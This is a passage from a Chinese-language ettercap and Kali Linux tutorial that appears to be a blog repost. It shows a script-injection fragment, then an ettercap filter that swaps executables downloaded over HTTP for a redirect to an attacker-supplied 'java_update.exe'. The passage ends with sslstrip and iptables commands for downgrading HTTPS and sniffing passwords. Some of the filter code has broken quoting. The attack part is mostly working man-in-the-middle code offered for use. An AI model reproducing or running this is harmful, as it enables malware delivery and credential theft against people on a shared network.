issue these commands to the GUI--【脚本alert('just for a test!');");alert('just for a test');");
msg("Filter run!...Exploit code injected ok!\n");
}
}
(4)替换URL
15 # replace rmccurdy with your website
16 # replace the url with what ever exe you like
17
18 if (ip.proto == TCP && tcp.dst == 80) {
19 if (search(DATA.data, "Accept-Encoding")) {
20 replace("Accept-Encoding", "Accept-Rubbish!");
21 # note: replacement string is same length as original string
22 msg("zapped Accept-Encoding!n");
23 }
24 }
25 if (ip.proto == TCP && tcp.src == 80) {
26 replace("keep-alive", "close" ");
27 replace("Keep-Alive", "close" ");
28 }
29
30 if (ip.proto == TCP && search(DATA.data, ": application") ){
31 # enable for logging log(DECODED.data, "/tmp/log.log");
32 msg("found EXEn");
33 # "Win32" is the first part of the exe example:
34 # if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
35 if (search(DATA.data, "Win32")) {
36 msg("doing nothingn");
37 } else {
38 replace("200 OK", "301 Moved Permanently Location: http://127.0.0.1/java_update.exe ");
39 msg("redirect successn");
40 }
41 }
0x03 SSL密码嗅探
对SSL流量的嗅探,可以使用sslstrip这个工具,它的原理就是把所有的https流量降级为http流量。相当于一个中间人的角色,它与服务器建立正常的https廉洁,而与浏览器则使用http连接。使用时需要本机开启流量转发,将80端口的http流量同时转发到10000端口上,在10000端口上使用sslstrip来监听即可:
# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
# sslstrip -l 10000
---------------------------------------------------------------------------------------------------
以下视频观看kali linux 系ettercap 命令使用教程
---------------------------------------------------------------------------------------------------
如果大家喜欢本教程可以点赞或转发收藏了。。。。。。
閱讀更多 電腦技術學習 的文章